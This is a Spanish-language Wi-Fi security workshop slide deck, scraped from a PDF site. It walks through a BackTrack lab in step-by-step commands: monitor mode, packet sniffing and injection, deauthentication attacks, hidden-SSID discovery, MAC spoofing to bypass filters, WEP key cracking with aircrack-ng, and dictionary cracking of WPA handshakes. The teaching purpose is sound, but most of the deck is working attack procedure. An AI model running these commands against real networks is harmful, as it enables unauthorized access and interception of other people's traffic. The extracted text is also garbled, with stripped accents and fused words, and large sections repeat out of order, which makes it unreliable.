httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 19: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

